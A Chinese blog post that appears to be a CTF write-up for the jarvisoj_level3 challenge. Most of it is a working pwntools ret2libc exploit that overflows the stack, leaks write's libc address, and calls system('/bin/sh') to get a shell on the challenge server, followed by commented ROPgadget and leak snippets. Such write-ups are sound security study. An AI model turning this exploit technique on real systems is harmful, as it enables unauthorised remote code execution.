jarvisoj_level3

小白垃圾笔记,不建议阅读。

看下保护。

 绕过NX        

泄露libc吧。

最近才知道buu有所有的libc:

 BUUCTF在线评测

拷贝到本地,感觉方便多了。

思路是通过write泄露write的地址,然后计算偏移。

exp:

from pwn import *
from LibcSearcher import *
debug=0
if debug:
    p=process('./level3')
    elf=ELF('./level3')
    #libc=ELF('/lib/i386-linux-gnu/libc.so.6')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
    libc=ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p=remote('node4.buuoj.cn',27819)
    elf=ELF('./level3')
    libc=ELF('/home/y/Desktop/pwn/libc/ubuntu1632/libc-2.23 (3).so')
    context.log_level='debug'
def ru(x):
    return p.recvuntil(x)
 
def se(x):
    p.send(x)
 
def sl(x):
    p.sendline(x)
    
pop_rdi_addr=  0x0000000000400733   # : pop rdi ; ret
ret_addr= 0x00000000004004d1         # : ret
pop_rsi_r15_addr=0x0000000000400731 #: pop rsi ; pop r15 ; ret

write_plt_addr=elf.plt['write']
write_got_addr=elf.got['write']
main_addr=elf.sym['main']  
#read_addr=elf.got['read']
#main_addr=0x0000000000400636
format_str=0x0000000000400770
 
ru(b'Input:\n')

payload = b'a'*(0x88+4)+p32(write_plt_addr)+p32(main_addr)+p32(1)+p32(write_got_addr)+p32(4)

se(payload+b'\n')

write_addr=u32(p.recvuntil(b'\xf7')[-4:])

#printf_addr=u32(p.recv(4))
print(hex(write_addr))

#libc=LibcSearcher('printf',printf_addr)
#libc_base_addr=printf_addr-libc.dump('printf')
#system_addr=libc_base_addr+libc.dump('system')
#bin_sh_addr=libc_base_addr+libc.dump('str_bin_sh')
 
 
 
libc_base_addr=write_addr-libc.sym['write']
system_addr=libc_base_addr+ libc.sym['system']	
bin_sh_addr=libc_base_addr+ next(libc.search(b'/bin/sh\x00'))
 

payload2=b'a'*(0x88+4)+p32(system_addr)+b'aaaa'+p32(bin_sh_addr)
 
 
ru(b'Input:\n')

se(payload2+b'\n')
#se(payload2.ljust(0x60,b'b')+b'\n')
#ru(b'\n')
p.interactive()



 
#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

#ROPgadget --binary babyrop2 |grep "pop rsi"

#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil(b'\xf7')[-4:])
#puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)
 

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值